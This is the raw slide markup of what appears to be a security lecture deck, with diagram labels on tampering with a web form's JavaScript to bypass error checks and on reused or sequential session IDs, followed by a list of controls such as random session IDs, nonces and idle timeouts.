            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="436523">
            <a:off x="5512245" y="3144269"/>
            <a:ext cx="1619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Web Form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31753" name="Line 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{000B8A54-4B97-434C-BB10-2BC825DD013B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4495800" y="4800600"/>
            <a:ext cx="3429000" cy="301144"/>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31754" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCD7B448-78B7-4DFE-81B1-0F7F0047EC2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21318563">
            <a:off x="4816701" y="4361682"/>
            <a:ext cx="271099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Revised form</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>With data and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31760" name="Line 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1550FCD8-871D-4F44-B249-CD5AA77C9664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4495800" y="2667000"/>
            <a:ext cx="11151" cy="33528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1761" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7751C6D-1B2F-4920-A07F-BADDB8EF08CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="3784937"/>
            <a:ext cx="1159292"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Modifies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>to avoid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>checks, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>changes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>permis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F05917A-36F5-475E-A17F-2A16729E8593}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4237566" y="1969277"/>
            <a:ext cx="1008113" cy="922667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D6B4E62-6A54-4585-98B1-A5E32B5628F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7466772" y="1466146"/>
            <a:ext cx="905215" cy="4782254"/>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75E3204F-830A-4015-8C94-FD70C8CDCA00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="648858"/>
            <a:ext cx="8229600" cy="1103742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Attack:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Reused Session IDs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38916" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D189A7B-721D-4468-BD3A-4282F1E721BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2819400" y="5181600"/>
            <a:ext cx="5181600" cy="45720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38917" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B322E40-DEFD-46A3-8C82-99ADFA060C01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-283399">
            <a:off x="3236757" y="5189537"/>
            <a:ext cx="20574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Web Request for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>www.abc.com/344</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38920" name="Line 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F4A7422-B7E7-473E-91FB-589894687D5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="2743200"/>
            <a:ext cx="0" cy="37338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8921" name="AutoShape 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{258F93C6-5BDE-44F8-8C9B-5B64382F0DDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="4191000"/>
            <a:ext cx="990600" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 48077"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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SzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>cache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38922" name="Line 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2927408-4A1C-4D42-A348-2D187CE94EBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="5867400"/>
            <a:ext cx="51816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23" name="Text Box 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01CF721B-D8B0-4489-9B8A-CF65DCAA5A9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="195487">
            <a:off x="4876800" y="5715000"/>
            <a:ext cx="2762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Web Form for actual data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.abc.com/344</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38927" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCFDE70F-DC33-4574-B6E5-EB5ADF0C8E0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2747963" y="3746500"/>
            <a:ext cx="5334000" cy="44450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38928" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C408AD26-86C0-4B80-8D0D-21FE0BF8BC18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-283399">
            <a:off x="3127622" y="3470898"/>
            <a:ext cx="2057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Web Request for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>www.abc.com/341</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38929" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1A0CCAE-68A1-4712-94FC-D63D1EFE1103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2857500" y="4237038"/>
            <a:ext cx="5181600" cy="45720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38930" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8552AE2-4560-4F0E-B636-3CB3F304680B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-283399">
            <a:off x="3219088" y="3972224"/>
            <a:ext cx="205581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Web Request for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>www.abc.com/342</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38931" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79840242-0E12-4253-8731-8DB9ECC9A788}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2819400" y="4813300"/>
            <a:ext cx="5181600" cy="45720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38932" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D8099B7-6791-4238-A34A-ABC6CB7F5537}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-283399">
            <a:off x="3254375" y="4540250"/>
            <a:ext cx="20558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a:t>Web Request for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800"/>
              <a:t>www.abc.com/343</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38933" name="Line 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF8C43E1-C19C-47E2-AFF3-E21019B673FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2743200" y="2667000"/>
            <a:ext cx="5257800" cy="22860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38934" name="Line 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3BFA65D-C5A4-4D7D-8F74-795E0E7C1641}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="2971800"/>
            <a:ext cx="5300663" cy="15240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38935" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C4C3F7-4413-42F1-9A0A-646FF21A6920}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-295627">
            <a:off x="3425825" y="2317750"/>
            <a:ext cx="25146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a:t>Web access login form</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38936" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDCDAA2D-F24F-4A8B-A349-6D40BC323689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="153872">
            <a:off x="4826172" y="3021853"/>
            <a:ext cx="321151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Web URL with authentication:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.abc.com/123</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F968DE40-632E-4D3D-BC2B-F742846312CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2349830" y="1613869"/>
            <a:ext cx="1008113" cy="922667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A85A2B5C-A7D7-43B0-B624-25388D89BA05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1650439" y="2260084"/>
            <a:ext cx="1398781" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3724C58-3743-4124-82B7-21F47103E1A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7218133" y="872932"/>
            <a:ext cx="1489401" cy="5604068"/>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D29428A8-9DA6-4DD6-AC7E-C4931826C137}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516991" y="523245"/>
            <a:ext cx="5410200" cy="1162050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" b="0" dirty="0"/>
              <a:t>Attack:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" b="0" dirty="0"/>
              <a:t>Reused Session IDs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86CF2C0F-2AC3-40F8-9D6B-A3A262A9DB64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360321" y="1599022"/>
            <a:ext cx="2495526" cy="4573178"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Encryption, integrity checks, nonce</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Random session IDs (not identical or sequential), closed at end of connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Idle timeouts close connection</a:t>
            </a:r>
          </a:p>
